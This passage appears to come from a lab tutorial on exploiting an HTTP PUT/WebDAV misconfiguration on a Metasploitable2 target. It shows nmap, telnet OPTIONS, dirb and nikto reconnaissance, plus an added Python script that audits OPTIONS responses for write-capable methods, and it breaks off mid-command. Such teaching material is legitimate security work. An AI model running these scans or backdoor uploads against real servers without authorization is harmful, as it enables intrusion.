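When the HTTP PUT method is enabled on a web server and misconfigured, a backdoor file can be uploaded straight to the server, giving a shell directly.
Test environment:
Attacking machine: Kali Linux
Target: Metasploitable2
0x001 Identification
# nmap scan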
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
Check which HTTP methods are enabled
telnet 192.168.1.104 80
Trying 192.168.1.104...
Connected to 192.168.1.104.
Escape character is '^]'.
OPTIONS /dav/ HTTP/1.1
Host: 192.168.1.100
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2018 23:09:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
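The same check done as a repeatable audit rather than by eye: this added example (not part of the original post) parses the OPTIONS response shown above and reports WebDAV and write-capable methods. The function names and the WRITE_METHODS set are assumptions chosen for the illustration.

```python
# Added example: audit an OPTIONS response for WebDAV and write-capable methods.
# WRITE_METHODS is an assumption of this sketch: methods that can change server content.
WRITE_METHODS = {"PUT", "DELETE", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

# Response headers copied from the telnet session above.
SAMPLE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 06 Sep 2018 23:09:39 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    "DAV: 1,2\r\n"
    "DAV: <http://apache.org/dav/propset/fs/1>\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK\r\n"
    "\r\n"
)

def parse_headers(raw):
    """Return (status_code, {lowercased name: [values]}) from a raw response head."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # repeated headers (two DAV lines here) are all kept
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers

def audit_options(raw):
    """Summarise what an OPTIONS response advertises and list review findings."""
    status, headers = parse_headers(raw)
    allow = {m.strip().upper() for v in headers.get("allow", [])
             for m in v.split(",") if m.strip()}
    dav = [t.strip() for v in headers.get("dav", []) for t in v.split(",") if t.strip()]
    findings = []
    if dav:
        findings.append("WebDAV enabled (DAV: %s)" % ", ".join(dav))
    writable = sorted(allow & WRITE_METHODS)
    if writable:
        findings.append("write-capable methods advertised: " + ", ".join(writable))
    if "TRACE" in allow:
        findings.append("TRACE advertised")
    if dav and "PUT" not in allow:
        # Allow describes only the requested URL, so absence of PUT proves nothing.
        findings.append("PUT absent from Allow for this URL; review the DAV write policy")
    return {"status": status, "allow": sorted(allow), "dav": dav, "findings": findings}

if __name__ == "__main__":
    for finding in audit_options(SAMPLE)["findings"]:
        print("[!]", finding)
```

In the captured response the Allow list for /dav/ does not name PUT even though DAV is on, so the audit flags the write policy for review instead of treating the list as proof that uploads are refused.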
Use dirb to brute-force directories
dirb <URL>
dirb http://192.168.1.104/
Run a vulnerability scan with nikto
nikto -h http://192.168.1.104/da